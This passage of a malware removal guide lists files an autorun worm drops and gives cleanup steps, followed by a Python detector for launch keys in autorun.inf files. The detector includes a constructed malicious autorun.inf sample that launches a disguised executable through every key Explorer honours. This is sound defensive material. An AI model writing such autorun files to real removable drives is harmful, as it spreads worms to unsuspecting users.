  3. Delete or disinfect the following files created/modified by the Virus:

    %WinDir%\system.ini (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
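Step 5 is easier to do reliably if the autorun.inf files collected from the removable drives are checked mechanically rather than by eye. The script below is an added example, not part of the Lavasoft report: it parses the [autorun] section of an autorun.inf and lists every key that makes Explorer launch a program (open, shellexecute and shell\<verb>\command). The report does not show the contents of the autorun.inf this sample writes, so both inputs are constructed; the hypothetical file name win2f8c.exe only loosely follows the win%s.exe template seen in the dump strings and is an assumption.

```python
"""Added example: list the launch targets an autorun.inf asks Explorer to run."""
import re

# Constructed samples (not taken from the page). The benign one only sets an
# icon and a label; the suspicious one launches a hypothetical win2f8c.exe
# through every key that can start a program.
BENIGN_AUTORUN = """\
[autorun]
icon=setup.exe,0
label=Vendor Drivers
"""

SUSPICIOUS_AUTORUN = """\
[AutoRun]
;written by an autorun worm (constructed example)
open=win2f8c.exe
shellexecute=win2f8c.exe
shell\\open\\command=win2f8c.exe
shell\\explore\\command=win2f8c.exe
shell=open
icon=%SystemRoot%\\system32\\shell32.dll,4
"""

LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_COMMAND_RE = re.compile(r"^shell\\([^\\]+)\\command$", re.IGNORECASE)


def parse_autorun(text):
    """Return (key, value) pairs from the [autorun] section, keys lower-cased.
    Repeated keys are kept in order so nothing is hidden by a later duplicate."""
    entries = []
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries.append((key.strip().lower(), value.strip()))
    return entries


def launch_targets(text):
    """Every command the file asks Explorer to run, with the key carrying it."""
    targets = []
    for key, value in parse_autorun(text):
        if key in LAUNCH_KEYS or SHELL_COMMAND_RE.match(key):
            targets.append((key, value))
    return targets


def is_suspicious(text):
    """A removable-drive autorun.inf that launches anything needs a look."""
    return bool(launch_targets(text))


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_AUTORUN), ("suspicious", SUSPICIOUS_AUTORUN)):
        print(name, is_suspicious(sample), launch_targets(sample))
```

Any launch key on a removable drive is treated as suspicious rather than matching on a file name, because the worm's file name is whatever it was when it was written and the icon= line is what it uses to look like an ordinary folder; once the targets are listed, the files they point to are the copies step 5 asks you to delete along with the autorun.inf itself.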
